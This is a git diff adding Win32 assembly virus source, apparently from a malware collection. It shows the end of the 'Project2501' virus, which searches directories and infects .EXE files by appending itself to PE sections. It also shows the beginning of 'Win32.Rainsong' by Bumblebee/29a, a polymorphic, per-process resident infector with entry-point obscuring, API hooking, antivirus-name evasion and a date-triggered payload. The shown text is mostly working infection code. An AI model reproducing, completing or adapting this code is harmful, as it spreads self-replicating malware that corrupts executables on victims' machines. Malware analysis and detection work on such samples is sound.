+exit_here: +push 0 +call [ebp+ExitProcess] + +find_mz_and_pe proc +add ecx,1 +cmp ecx,11 +je mz_not_found +mov bx,word ptr [eax] +cmp bx,'ZM' +je find_the_pe +sub eax,010000h +jmp find_mz_and_pe +find_the_pe: +mov esi,eax +mov ebx,dword ptr [eax+3ch] +add eax,ebx +mov bx,word ptr [eax] +cmp bx,'EP' +jne mz_not_found +mov dword ptr [ebp+kernelbase],esi +mov dword ptr [ebp+kernelpeheader],eax +ret +mz_not_found: +jmp reanimation_part + +find_mz_and_pe endp + +find_apis proc +pop esi +pop eax +mov dword ptr [ebp+apinameoffset],eax +pop eax +mov dword ptr [ebp+apilenght],eax +pop eax +mov dword ptr [ebp+putitthere],eax +push esi +mov eax,dword ptr [ebp+kernelpeheader] +mov esi,dword ptr [eax+78h] +add esi,dword ptr [ebp+kernelbase] +add esi,1ch +mov eax,dword ptr [esi] +add eax,dword ptr [ebp+kernelbase] +mov dword ptr [ebp+adress_table_VA],eax +add esi,4 +mov eax,dword ptr [esi] +add eax,dword ptr [ebp+kernelbase] +mov dword ptr [ebp+name_table_VA],eax +add esi,4 +mov eax,dword ptr [esi] +add eax,dword ptr [ebp+kernelbase] +mov dword ptr [ebp+ordinal_table_VA],eax +mov esi,dword ptr [ebp+name_table_VA] +mov dword ptr [ebp+apicounter],00000000h +find_the_name: +push esi +mov eax,dword ptr [esi] +add eax,dword ptr [ebp+kernelbase] +mov esi,eax +mov edi,dword ptr [ebp+apinameoffset] +mov ecx,0 +mov cl,byte ptr [ebp+apilenght] +cld +rep cmpsb +jz we_found_it +pop esi +add esi,4 +inc dword ptr [ebp+apicounter] +jmp find_the_name +we_found_it: +pop esi ;taken from BillyBel +mov eax,dword ptr [ebp+apicounter] +shl eax,1 +add eax,dword ptr [ebp+ordinal_table_VA] +mov esi,0 +xchg eax,esi +lodsw +shl eax,2 +add eax,dword ptr [ebp+adress_table_VA] +mov esi,eax +lodsd +add eax,dword ptr [ebp+kernelbase] +mov ecx,dword ptr [ebp+putitthere] +mov dword ptr [ecx],eax +ret + +find_apis endp + +find_all_apis proc +lea eax,[ebp+offset ExitProcess] +push eax +push dword ptr [ebp+exitprocesslenght] +lea eax,[ebp+offset _ExitProcess] +push eax +call find_apis +lea eax,[ebp+offset FindFirstFileA] +push eax +push dword ptr [ebp+findfirstfilelenght] +lea eax,[ebp+offset _FindFirstFileA] +push eax +call find_apis +lea eax,[ebp+offset FindNextFileA] +push eax +push dword ptr [ebp+findnextfilelenght] +lea eax,[ebp+offset _FindNextFileA] +push eax +call find_apis +lea eax,[ebp+offset CreateFileA] +push eax +push dword ptr [ebp+createfilelenght] +lea eax,[ebp+offset _CreateFileA] +push eax +call find_apis +lea eax,[ebp+offset CloseHandle] +push eax +push dword ptr [ebp+closehandlelenght] +lea eax,[ ebp+offset _CloseHandle] +push eax +call find_apis +lea eax,[ebp+offset CreateFileMappingA] +push eax +push dword ptr [ebp+createfilemappinglenght] +lea eax,[ebp+offset _CreateFileMappingA] +push eax +call find_apis +lea eax,[ebp+offset MapViewOfFile] +push eax +push dword ptr [ebp+mapviewoffilelenght] +lea eax,[ebp+offset _MapViewOfFile] +push eax +call find_apis +lea eax,[ebp+offset UnmapViewOfFile] +push eax +push dword ptr [ebp+unmapviewoffilelenght] +lea eax,[ebp+offset _UnmapViewOfFile] +push eax +call find_apis +lea eax,[ebp+offset GetFileSize] +push eax +push dword ptr [ebp+getfilesizelenght] +lea eax,[ebp+offset _GetFileSize] +push eax +call find_apis +lea eax,[ebp+offset SetFilePointer] +push eax +push dword ptr [ebp+setfilepointerlenght] +lea eax,[ebp+offset _SetFilePointer] +push eax +call find_apis +lea eax,[ebp+offset SetEndOfFile] +push eax +push dword ptr [ebp+setendoffilelenght] +lea eax,[ebp+offset _SetEndOfFile] +push eax +call find_apis +lea eax,[ebp+offset SetCurrentDirectoryA] +push eax +push dword ptr [ebp+setcurrentdirectorylenght] +lea eax,[ebp+offset _SetCurrentDirectoryA] +push eax +call find_apis +lea eax,[ebp+offset CreateDirectoryA] +push eax +push dword ptr [ebp+createdirectorylenght] +lea eax,[ebp+offset _CreateDirectoryA] +push eax +call find_apis +ret +find_all_apis endp + +seek_and_destroy proc +find_first_file: +mov byte ptr [ebp+infection_flag],0 +lea eax,[ebp+offset FindFileData] +push eax +lea eax,[ebp+offset tosearch] +push eax +call [ebp+FindFirstFileA] +mov dword ptr [ebp+findfilehandle],eax +inc eax +jz no_files_left +jmp open_the_file +find_next_file: +mov byte ptr [ebp+infection_flag],0 +lea eax,[ebp+offset FindFileData] +push eax +push dword ptr [ebp+findfilehandle] +call [ebp+FindNextFileA] +test eax,eax +jz no_files_left +open_the_file: +push 0 +push 0 +push 3 +push 0 +push 1 +push 80000000h + 40000000h +lea eax,[ebp+offset FindFileData.cFileName] +push eax +call [ebp+CreateFileA] +cmp eax,0ffffffffh +je find_next_file +mov dword ptr [ebp+filehandle],eax +push 0 +push dword ptr [ebp+filehandle] +Call [ebp+GetFileSize] +calculate_new_size: +mov dword ptr [ebp+thefilesize],eax +add eax,virus_end-start +add eax,100 +now_make_file_mapping: +push 0 +push eax +push 0 +push 4 +push 0 +push dword ptr [ebp+filehandle] +call [ebp+CreateFileMappingA] +mov dword ptr [ebp+filemappinghandle],eax +mov eax,dword ptr [ebp+thefilesize] +add eax,virus_end-start +add eax,100 +push eax +push 0 +push 0 +push 2 +push dword ptr [ebp+filemappinghandle] +call [ebp+MapViewOfFile] +mov dword ptr [ebp+mapadress],eax +cmp word ptr [eax],'ZM' +jne search_another +mov ebx,0 +mov bx,word ptr [eax+3ch] +cmp word ptr [eax+ebx],'EP' +jne search_another +cmp word ptr [eax+38h],'AA' +je search_another +call infect_file +search_another: +cmp byte ptr [ebp+infection_flag],1 +je close_normal +call close_not_normal +close_normal: +push dword ptr [ebp+mapadress] +call [ebp+UnmapViewOfFile] +push dword ptr [ebp+filemappinghandle] +call [ebp+CloseHandle] +push dword ptr [ebp+filehandle] +call [ebp+CloseHandle] +jmp find_next_file + +no_files_left: +cmp byte ptr [ebp+am_i_up],1 +je go_down +lea eax,[ebp+offset FindFileData] +push eax +lea eax,[ebp+offset allfiles] +push eax +call [ebp+FindFirstFileA] +mov dword ptr [ebp+dir_search_handle],eax +inc eax +jz no_dirs_left +cmp byte ptr [ebp+FindFileData.cFileName],'.' +je find_next_dir +jmp is_it_dir +find_next_dir: +lea eax,[ebp+offset FindFileData] +push eax +push dword ptr [ebp+dir_search_handle] +call [ebp+FindNextFileA] +test eax,eax +jz no_dirs_left +cmp byte ptr [ebp+FindFileData.cFileName],'.' +je find_next_dir +is_it_dir: +cmp dword ptr [ebp+FindFileData.dwFileAttributes],10h +je it_is_dir +jmp find_next_dir +it_is_dir: +lea eax,[ebp+FindFileData.cFileName] +push eax +call [ebp+SetCurrentDirectoryA] +mov byte ptr [ebp+am_i_up],1 +jmp find_first_file +no_dirs_left: +lea eax,[ebp+offset dotdot] +push eax +call [ebp+SetCurrentDirectoryA] +add byte ptr [ebp+dir_counter],1 +cmp byte ptr [ebp+dir_counter],5 +je all_for_now +mov byte ptr [ebp+am_i_up],0 +jmp find_first_file +all_for_now: +ret +go_down: +lea eax,[ebp+offset dotdot] +push eax +call [ebp+SetCurrentDirectoryA] +mov byte ptr [ebp+am_i_up],0 +jmp find_next_dir +seek_and_destroy endp + +close_not_normal proc +push 0 +push 0 +push dword ptr [ebp+thefilesize] +push dword ptr [ebp+filehandle] +call [ebp+SetFilePointer] +push dword ptr [ebp+filehandle] +call [ebp+SetEndOfFile] +ret +close_not_normal endp + +infect_file proc +mov byte ptr [ebp+infection_flag],1 +mov eax,dword ptr [ebp+mapadress] +mov word ptr [eax+38h],'AA' +mov edi,0 +mov di,word ptr [eax+3ch] +add eax,edi ;peheader at eax +mov dword ptr [ebp+peheader_offset],eax +mov esi,dword ptr [eax+28h] +mov dword ptr [ebp+old_entry_point],esi +mov esi,dword ptr [eax+3ch] +mov dword ptr [ebp+file_allign],esi +mov esi,dword ptr [eax+34h] +mov dword ptr [ebp+image_base],esi +mov esi,eax +go_to_last_section: +mov ebx,dword ptr [esi+74h] +shl ebx,3 +mov eax,0 +mov ax,word ptr [esi+6h] +dec eax +mov ecx,28h +mul ecx +add esi,78h +add esi,ebx +add esi,eax + +modify_it: +or dword ptr [esi+24h],00000020h +or dword ptr [esi+24h],20000000h +or dword ptr [esi+24h],80000000h +mov eax, [esi+10h] ;code taken from Lord Julus (im not good in math) +mov dword ptr [ebp+old_raw_size],eax +add dword ptr [esi+8h],(offset virus_end - offset start) +mov eax,dword ptr [esi+8h] +mov ecx,dword ptr [ebp+file_allign] +div ecx +mov ecx,dword ptr [ebp+file_allign] +sub ecx,edx +mov dword ptr [esi+10h],eax +mov eax,dword ptr [esi+8h] +add eax,dword ptr [esi+10h] +mov dword ptr [esi+10h],eax +mov dword ptr [ebp+new_raw_size],eax +mov eax,dword ptr [esi+0ch] +add eax,dword ptr [esi+8h] +sub eax,(offset virus_end-offset start) +mov dword ptr [ebp+new_entry],eax +mov eax,dword ptr [ebp+old_raw_size] +mov ebx,dword ptr [ebp+new_raw_size] +sub ebx,eax +mov dword ptr [ebp+inc_raw_size],ebx +mov eax,dword ptr [esi+14h] +add eax,dword ptr [ebp+new_raw_size] +mov dword ptr [ebp+new_file_size],eax +mov eax,dword ptr [esi+14h] +add eax,dword ptr [esi+8] +sub eax,(offset virus_end-offset start) +add eax,dword ptr [ebp+mapadress] +mov edi,eax +lea esi,[ebp+offset start] +mov ecx,(offset virus_end-offset start) +rep movsb +mov esi,dword ptr [ebp+peheader_offset] +mov eax,dword ptr [ebp+new_entry] +mov dword ptr [esi+28h],eax +mov eax,dword ptr [ebp+inc_raw_size] +add dword ptr [esi+50h],eax +ret +infect_file endp + +payload proc +push 0 +lea eax,[ebp+offset dir_name] +push eax +call [ebp+CreateDirectoryA] +ret +payload endp + +new_file_size dd 0 +inc_raw_size dd 0 +new_entry dd 0 +new_raw_size dd 0 +old_raw_size dd 0 +file_allign dd 0 +peheader_offset dd 0 +image_base dd 0 +old_entry_point dd 0 +image_base2 dd 0 +old_entry_point2 dd 0 + +kernelbase dd 0 +kernelpeheader dd 0 +adress_table_VA dd 0 +name_table_VA dd 0 +ordinal_table_VA dd 0 +apicounter dd 00000000h +apinameoffset dd 0 +apilenght dd 0 +putitthere dd 0 + +ExitProcess dd 00000000h +_ExitProcess db 'ExitProcess',0 +exitprocesslenght dd 12 +FindFirstFileA dd 00000000h +_FindFirstFileA db 'FindFirstFileA',0 +findfirstfilelenght dd 15 +FindNextFileA dd 00000000h +_FindNextFileA db 'FindNextFileA',0 +findnextfilelenght dd 14 +CreateFileA dd 00000000h +_CreateFileA db 'CreateFileA',0 +createfilelenght dd 12 +CloseHandle dd 00000000h +_CloseHandle db 'CloseHandle',0 +closehandlelenght dd 12 +CreateFileMappingA dd 00000000h +_CreateFileMappingA db 'CreateFileMappingA',0 +createfilemappinglenght dd 19 +MapViewOfFile dd 00000000h +_MapViewOfFile db 'MapViewOfFile',0 +mapviewoffilelenght db 14 +UnmapViewOfFile dd 00000000h +_UnmapViewOfFile db 'UnmapViewOfFile',0 +unmapviewoffilelenght dd 16 +GetFileSize dd 00000000h +_GetFileSize db 'GetFileSize',0 +getfilesizelenght dd 12 +SetEndOfFile dd 00000000h +_SetEndOfFile db 'SetEndOfFile',0 +setendoffilelenght dd 13 +SetFilePointer dd 00000000h +_SetFilePointer db 'SetFilePointer',0 +setfilepointerlenght dd 15 +SetCurrentDirectoryA dd 0 +_SetCurrentDirectoryA db 'SetCurrentDirectoryA',0 +setcurrentdirectorylenght dd 21 +CreateDirectoryA dd 0 +_CreateDirectoryA db 'CreateDirectoryA',0 +createdirectorylenght dd 17 + +mapadress dd 0 +infection_flag db 0 + +tosearch db '*.EXE',0 +findfilehandle dd 0 +filehandle dd 0 +thefilesize dd 0 +filemappinghandle dd 0 +credit db 'Project2501 was coded by BeLiAL' + db 'Greetings to a nice girl from scandinavia' +dotdot db '..',0 +allfiles db '*.*',0 +dir_search_handle dd 0 +am_i_up db 0 +dir_name db 'c:\windows\desktop\Project2501',0 +dir_counter db 0 + +MAX_PATH EQU 260 +FILETIME struct +dwLowDateTime DWORD ? +dwHighDateTime DWORD ? +FILETIME ends +WIN32_FIND_DATA struct +dwFileAttributes DWORD ? +ftCreationTime FILETIME <> +ftLastAccessTime FILETIME <> +ftLastWriteTime FILETIME <> +nFileSizeHigh DWORD ? +nFileSizeLow DWORD ? +dwReserved0 DWORD ? +dwReserved1 DWORD ? +cFileName BYTE MAX_PATH dup(?) +cAlternate BYTE 0eh dup(?) +ends +FindFileData WIN32_FIND_DATA <> + +virus_end: +end start + diff --git a/Win32/Win32.Rainsong.asm b/Win32/Win32.Rainsong.asm new file mode 100644 index 00000000..a4e5fd6b --- /dev/null +++ b/Win32/Win32.Rainsong.asm @@ -0,0 +1,1820 @@ + +; +; 樂栩栩 樂栩栩 樂栩栩 +; 栩 栩 栩 栩 栩 栩 +; The Rain Song 樛樂桎 炳栩栩 栩栩栩 +; Coded by Bumblebee/29a 栩桀樛 樛樛栩 栩 栩 +; 栩栩栩 栩栩栩 栩 栩 +; 敖陳陳陳陳陳陳陳陳陳陳陳 +; Words from the author 団陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; 青陳陳陳陳陳陳陳陳陳陳陳 +; . The best way to code a virus: listening Led Zeppelin (i'm not so +; old, but the best is ever good ;). And in the time i was coding this +; bug i became hooked again by the Dr. Asimov. 'Pelude to Foundation' +; it's the book. Here in spain the books are going even more expensive, +; but there are cheap editions of Asimov's work (about 6 Euros). The +; name of the virus is from the amazing song by Led Zeppelin, of coz. +; But the payload is a little tribute to Isaac Asimov. Very little. +; This virus triggers its payload in the death date of Asimov. +; May be you're interested in sci-fi, or just looking for a good book to +; evade yourself from reality, there are some titles i love (this could +; be a nice order to read them): +; +; Basics about the Foundation: +; +; Foundation +; Foundation and Empire +; Second Foundation +; +; This books could be readed before or after the basics: +; +; Prelude to Foundation +; Forward the Foundation +; +; It's true the titles say nothing about the book contents. hehehe. This +; is Asimov ;) I feel you'll like them. Books made me be a bit as i am. +; There is nothing that makes you more as you are that those things you +; choose to ignore. Hey! take that ;) +; +; . This is my first per-process virus and also my first virus with EPO. +; Don't spect too much of it. It isn't anything you haven't seen before, +; but with Bumblebee style. May be you're thinking in this way asm32 is +; going more and more close to macro coding (hi ya urgo32!). I'm not +; here for the money ;) Only for fun. And fun is not ever innovate... +; If you think this virus is worth less releasing let me know! +; +; 敖陳陳陳陳陳朕 +; Disclaimer 団陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; 青陳陳陳陳陳潰 +; . This is the source code of a VIRUS. The author is not responsabile +; of any damage that may occur due to the assembly of this file. Use +; it at your own risk. +; +; 敖陳陳陳陳朕 +; Features 団陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; 青陳陳陳陳潰 +; . Works under win32 systems: +; Windows 9x +; Windows Nt +; Windows 2000 +; Future versions? +; . Uses SEH during scan kernel process. If the virus gets control from +; EPO i test 1st for the last used address and if fails i test using the +; Win9x, WinNt and Win2k fixed kernel addresses. In this case it could +; not work in future versions of win32. But if i can rely in the stack i +; hope it will work also if the kernel changes its address. +; . Gets needed API scanning kernel32.dll in memory using CRC32 instead +; of names. +; . Infects PE files increasing last section. +; . Increases virtual size the amount of bytes needed to have memory for +; temporary data. (virt size>phys size) +; . Takes care of relocations in execution time. +; . Uses size padding as infection sign. +; . Avoids infect most used AV. +; . Per-process resident hooking: +; CreateFileA +; MoveFileA +; CopyFileA +; CreateProcessA +; SetFileAttributesA +; GetFileAttributesA +; SearchPathA +; . Gets the path from the hooked calls to the APIs and infects the +; files found in the directory. +; . Has a runtime part that infects files in windows directory. +; . Infects PE with the extension EXE and SCR. +; . It has 2 layers of encryption. First polymorphic and second a simple +; not loop. This is due to 1st layer uses 32 bits key and i don't want +; bytes unencrypted. +; . Has EPO (Entry Point Obscuring) tech patching a call into the code +; section of the infected program. Supports also the more standard way +; of patching PE header, but avoids it if possible trying to do light +; EPO adding a jmp to the virus at the end of the original code section. +; +; +; AVP Description 陳[comments]陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; Win32.Rainsong +; +;This is a dangerous per-process memory resident parasitic polymorphic +;Win32 virus. It searches for PE EXE files (Windows executable files) in +;Windows directory and infects them. Then it stays in Windows memory as a +;component of host application and affects PE EXE files that are accessed +;by host application. +; +;While infecting the virus writes itself to the end of the file by increasing +;the size of last file section. The virus uses "Entry Point Obscuring" methods +;and while infecting it does not modify program's entry address. To receive +;control when infected program is run, the virus scans victim file body, looks +;for a CALL command and replaces it with "JUMP VirusEntry" code. As a result +;the virus gets control not immediately at infected file start, but only in +;case the patched file code receives control. +; +;The virus has a bug and often corrupt files while infecting them. +;[This is true due i don't check if the import section has write attributes] +;[RainSong will corrupt all the windows file in win98 se :(] +; +;The virus avoids several anti-virus files infection, it detects them by two +;first letters in file name: AV*, AN*, DR*, ID*, OD*, TB*, F-*. +;[They NEVER analize the algo!!! A file called ?????AV.??? is never infected] +;[Why they insist in the 'two fist letters' shit?] +; +;On April 6th it generates Windows error message with the text: +; +;ASIMOV Jan.2.1920 - Apr.6.1992 +; +;The virus also contains the text: +; +;< The Rain Song Coded By Bumblebee/29a > +; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; +; The source is commented so... have fun! +; After i've released it i've found 2 little bugs :( +; But don't worry, it work fine. See comments. +; +; +; The way of the bee +; +.486p +locals +.model flat,STDCALL + + extrn ExitProcess:PROC ; needed for 1st generation + + vSize equ vEnd-vBegin + crptSize equ crptEND-crptINI + PADDING equ 101 + STRINGTOP equ 160 + +; from BC++ Win32 API on-line Reference +WIN32_FIND_DATA struc +dwFileAttributes dd 0 +dwLowDateTime0 dd ? ; creation +dwHigDateTime0 dd ? +dwLowDateTime1 dd ? ; last access +dwHigDateTime1 dd ? +dwLowDateTime2 dd ? ; last write +dwHigDateTime2 dd ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved dd 0,0 +cFileName db 260 dup(0) +cAlternateFilename db 14 dup(0) + db 2 dup(0) +WIN32_FIND_DATA ends + +.DATA + ; dummy data + db 'WARNING - This is a virus carrier - WARNING' + +.CODE +vBegin label byte +inicio: + ; call for the polymorphic decryptor + call crypt + +crptINI label byte + ; a lame 2nd layer + call secondLayerDecrypt +crptSecondINI label byte + + ; to store the return to host address + push offset fakeHost +hostRET equ $-4 + pushad + ; to support relocs + push offset inicio +virusEP equ $-4 + + ; get delta offset + call getDelta + + ; setup relocations + pop eax ; get stored virus EP + lea edx,inicio+ebp ; get current + sub edx,eax ; calc displacement + add dword ptr [esp+20h],edx ; fix hostRET + add dword ptr [imageBase+ebp],edx ; fix image base + + ; Get Kernel32 address + ; 1st check if we are in a EPO address + mov eax,dword ptr [EPOAddr+ebp] + or eax,eax + jz getK32notEPO + + ; we canot rely on stack... try some addresses +tryFix: + mov esi,dword ptr [kernel32+ebp] ; test latest + inc esi + call GetKernel32 + jnc getAPIsNow + + mov esi,077e00001h ; test for win2k + call GetKernel32 + jnc getAPIsNow + + mov esi,077f00001h ; test for winNt + call GetKernel32 + jnc getAPIsNow + + mov esi,0bff70001h ; test for win9x + call GetKernel32 + jc returnHost + jmp getAPIsNow + +getK32notEPO: + ; use the value in the stack + mov esi,dword ptr [esp+24h] + call GetKernel32 + jc tryFix + +getAPIsNow: + ; now get APIs using CRC32 + mov edi,12345678h +kernel32 equ $-4 + mov esi,edi + mov esi,dword ptr [esi+3ch] + add esi,edi + mov esi,dword ptr [esi+78h] + add esi,edi + add esi,1ch + + lodsd + add eax,edi + mov dword ptr [address+ebp],eax + lodsd + add eax,edi + mov dword ptr [names+ebp],eax + lodsd + add eax,edi + mov dword ptr [ordinals+ebp],eax + + sub esi,16 + lodsd + mov dword ptr [nexports+ebp],eax + + xor edx,edx + mov dword ptr [expcount+ebp],edx + lea eax,FSTAPI+ebp + +searchl: + mov esi,dword ptr [names+ebp] + add esi,edx + mov esi,dword ptr [esi] + add esi,edi + push eax edx edi + xor edi,edi + movzx di,byte ptr [eax+4] + call CRC32 + xchg ebx,eax + pop edi edx eax + cmp ebx,dword ptr [eax] + je fFound + add edx,4 + inc dword ptr [expcount+ebp] + push edx + mov edx,dword ptr [expcount+ebp] + cmp dword ptr [nexports+ebp],edx + pop edx + je returnHost + jmp searchl +fFound: + shr edx,1 + add edx,dword ptr [ordinals+ebp] + xor ebx,ebx + mov bx,word ptr [edx] + shl ebx,2 + add ebx,dword ptr [address+ebp] + mov ecx,dword ptr [ebx] + add ecx,edi + + mov dword ptr [eax+5],ecx + add eax,9 + xor edx,edx + mov dword ptr [expcount+ebp],edx + lea ecx,ENDAPI+ebp + cmp eax,ecx + jb searchl + + ; we must make a memory copy of the virus and work there + ; the original copy it's patched to return host. + ; This is necessary due we could be called from a call more + ; than once... just think what happens when you decrypt twice... + push 00000040h + push 00001000h OR 00002000h + push (vSize+1000h) + push 0h + call dword ptr [_VirtualAlloc+ebp] + or eax,eax + jz returnHost + + lea esi,inicio+ebp + mov edi,eax + mov ecx,vSize + rep movsb + lea esi,hostRET-1 + lea edi,inicio+ebp + mov ecx,5 + rep movsb + mov byte ptr [edi],0c3h + add eax,offset memCopy-offset inicio + push eax + ret + +memCopy: + ; get delta offset another time + call getDelta + + lea edx,fileSize+ebp ; check for Asimov + push edx ; death date + call dword ptr [_GetSystemTime+ebp] + + lea edx,fileSize+ebp + cmp word ptr [edx+2],4 + jne skipPay + cmp word ptr [edx+6],6 + jne skipPay + + lea edx,message+ebp + push edx + xor eax,eax + push eax + call dword ptr [_FatalAppExitA+ebp] ; bye bye ;) + +skipPay: + ; alloc a temporary buffer to generate the poly sample + ; of the virus ready to infect + push 00000004h + push 00001000h OR 00002000h + push (vSize+1000h) + push 0h + call dword ptr [_VirtualAlloc+ebp] + or eax,eax + jz returnHost + + mov dword ptr [memHnd+ebp],eax + + ; the same polymorphic routine is used for each infection + ; in the current execution of the virus + call dword ptr [_GetTickCount+ebp] + mov edi,dword ptr [memHnd+ebp] + add edi,vSize + mov ecx,(crptSize/4)-(4-(crptSize MOD 4)) + call GenDCrpt + ; store the size of the sample (for infection process) + ; and calc the virtual size + mov dword ptr [virtsize+ebp],vSize + cmp eax,BUFFERSIZE + jb decryptorSmall + add dword ptr [virtsize+ebp],eax + jmp virtSizeOk +decryptorSmall: + add dword ptr [virtsize+ebp],BUFFERSIZE +virtSizeOk: + add eax,vSize + mov dword ptr [gensize+ebp],eax + + ; Hook the API to get per-process residency + ; Notice this must be called before any infection + call hookApi + + lea esi,stringBuffer+ebp ; get current directory + push esi + push STRINGTOP + call dword ptr [_GetCurrentDirectoryA+ebp] + or eax,eax + jz returnHost + + push STRINGTOP ; get windows directory + lea esi,tmpPath+ebp + push esi + call dword ptr [_GetWindowsDirectoryA+ebp] + or eax,eax + jz returnHost + + lea esi,tmpPath+ebp ; goto windows directory + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + or eax,eax + jz returnHost + + call infectDir ; infect!! buahahahah! + ; estoooo + lea esi,stringBuffer+ebp ; go back home ;) + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + +returnHost: + popad + ret +; +; Returns Delta offset into ebp. +; +getDelta: + call delta +delta: + pop ebp + sub ebp,offset delta + ret +; +; General hook. This routine is for all the hooks. +; We have into esi the path to analize, the address of the +; original API in the stack (plus a pushad) and the delta +; offset into ebp. I use a semaphore 'cause the virus doesn't support +; multithread. In case hooked API is called by other thread while +; the virus is in the infection process could be fatal. I'm not sure +; 100% this is necessary but... ;) +; +generalHook: + pushfd + cld + ; set sem to working + mov byte ptr [semHook+ebp],1 + + call stringUp + jc hookInfectionFail + + push edi + lea edx,stringBuffer+ebp + push edx + call dword ptr [_GetFileAttributesA+ebp] + pop edi + inc eax + jz hookInfectionFail + dec eax + + and eax,00000010h ; it's a directory? + jnz infectPath + + lea edx,stringBuffer+ebp + cmp word ptr [edx+1],'\:' ; absolute path? + je getPath + + cmp word ptr [edx],'\\' ; absolute path? + jne infectCurrent + + ; if it's an absolute path to a file we quit the + ; filename and try the directory +getPath: + cmp byte ptr [edi],'\' + je pathOk + dec edi + cmp edx,edi + je hookInfectionFail + jmp getPath + +pathOk: + mov dword ptr [edi],0 ; now we have a path + + ; infects the path changing directory +infectPath: + ; get current directory + lea esi,tmpPath+ebp + push esi + push STRINGTOP + call dword ptr [_GetCurrentDirectoryA+ebp] + or eax,eax + jz hookInfectionFail + + ; set current directory to path + lea esi,stringBuffer+ebp + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + or eax,eax + jz hookInfectionFail + + call infectDir + + ; restore current directory + lea esi,tmpPath+ebp + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + + jmp hookInfectionFail + + ; infects current directory 'cause we haven't any path + ; to check (and the accessed file it's just there!) +infectCurrent: + call infectDir + +hookInfectionFail: + ; set sem to free + mov byte ptr [semHook+ebp],0 + popfd + popad + ret +; +; Nice macro ;) +; +@hook macro ApiAddress + push eax + pushad + call getDelta + mov eax,dword ptr [ApiAddress+ebp] + mov dword ptr [esp+20h],eax + mov esi,dword ptr [esp+28h] + + or esi,esi ; skip NULLs in filename + jz @@skipThisCall + + cmp byte ptr [semHook+ebp],0 + je generalHook +@@skipThisCall: + popad + ret +endm +; +; The hooks. +; +Hook0: + @hook _CreateFileA +Hook1: + @hook _MoveFileA +Hook2: + @hook _CopyFileA +Hook3: + @hook _CreateProcessA +Hook4: + @hook _SetFileAttributesA +Hook5: + @hook _GetFileAttributesA +Hook6: + @hook _SearchPathA +Hook7: ; this data it's included but + @hook _SetCurrentDirectoryA ; not used... ops + ; i can remove it, but better it + ; fits the released binary + ; i realized this bug after release +; +; This routine hooks the API that gives the virus per-process residency. +; The image base address is stored in the infection process. +; +hookApi: + pushad + ; init the sem to free + mov byte ptr [semHook+ebp],0 + mov edx,400000h +imageBase equ $-4 + cmp word ptr [edx],'ZM' + jne noHook + mov edi,edx + add edi,dword ptr [edx+3ch] + cmp word ptr [edi],'EP' + jne noHook + mov edi,dword ptr [edi+80h] ; RVA import + add edi,edx +searchK32Imp: + mov esi,dword ptr [edi+0ch] ; get name + or esi,esi + jz noHook + add esi,edx + push edi ; save (stringUp doesn't) + call stringUp + pop edi + jc nextName + lea esi,stringBuffer+ebp + cmp dword ptr [esi],'NREK' ; look for Kernel32 module + jne nextName + cmp dword ptr [esi+4],'23LE' + je k32ImpFound +nextName: + add edi,14h + mov esi,dword ptr [edi] + or esi,esi + jz noHook + jmp searchK32Imp +k32ImpFound: + mov esi,dword ptr [edi+10h] ; get address table + or esi,esi + jz noHook + add esi,edx + lea ecx,HOOKTABLEEND+ebp +nextImp: ; search for APIs + lea edx,HOOKTABLEBEGIN+ebp + lodsd + or eax,eax + jz noHook +checkNextAPI: + mov edi,dword ptr [edx] + cmp eax,dword ptr [edi+ebp] + je doHook + add edx,8 + cmp edx,ecx + jne checkNextAPI + jmp nextImp +doHook: + mov eax,dword ptr [edx+4] + add eax,ebp + mov dword ptr [esi-4],eax + add edx,8 + cmp edx,ecx + jne nextImp +noHook: + popad + ret +; +; Changes to upper case the string by esi storing into stringBuffer. +; Sets carry flag if our string buffer is small. Returns in edi the +; end of the string into the buffer. Requires SEH. +; +stringUp: + push esi eax + lea edi,stringBuffer+ebp + mov eax,edi + add eax,STRINGTOP +stringUpLoop: + cmp eax,edi + jne continueStringUp + stc + jmp stringUpOut +continueStringUp: + movsb + cmp byte ptr [esi-1],'a' + jb skipThisChar + cmp byte ptr [esi-1],'z' + ja skipThisChar + add byte ptr [edi-1],'A'-'a' +skipThisChar: + cmp byte ptr [esi-1],0 + jne stringUpLoop + dec edi + clc +stringUpOut: + pop eax esi + ret +; +; This routine gets Kernel32 address. Uses SEH. +; The main purpose of this routine is search for the k32 address using +; a 'guess' address from the stack. But i cannot rely on the stack when +; the virus starts from EPO. Look the pieze of code that calls this +; routine to see how to fix it easily. +; Take a look to the article by Lethal Mind/29a from 29a#4 for more +; information about this method. +; +GetKernel32: + pushad + xor edx,edx + lea eax,dword ptr [esp-8h] + xchg eax,dword ptr fs:[edx] + lea edi,GetKernel32Exception+ebp + push edi + push eax + +GetKernel32Loop: + dec esi + cmp word ptr [esi],'ZM' ; 'poda' -> this makes algo + jne GetKernel32Loop ; faster + mov dx,word ptr [esi+3ch] + test dx,0f800h + jnz GetKernel32Loop + cmp esi,dword ptr [esi+edx+34h] + jne GetKernel32Loop + mov dword ptr [kernel32+ebp],esi + + xor edi,edi + pop dword ptr fs:[edi] + pop eax + popad + clc + ret + +GetKernel32Exception: + xor edi,edi + mov eax,dword ptr fs:[edi] + mov esp,dword ptr [eax] + xor edi,edi + pop dword ptr fs:[edi] + pop eax + popad + stc + ret +; +; This routine makes CRC32. +; +CRC32: + cld + xor ecx,ecx + dec ecx + mov edx,ecx + push ebx +NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + mov dl,dh + mov dh,8 +NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h +NoCRC: + dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi + jnz NextByteCRC + pop ebx + not edx + not ecx + mov eax,edx + rol eax,16 + mov ax,cx + ret +; +; Updates the virus sample ready to infect in our memory buffer. +; 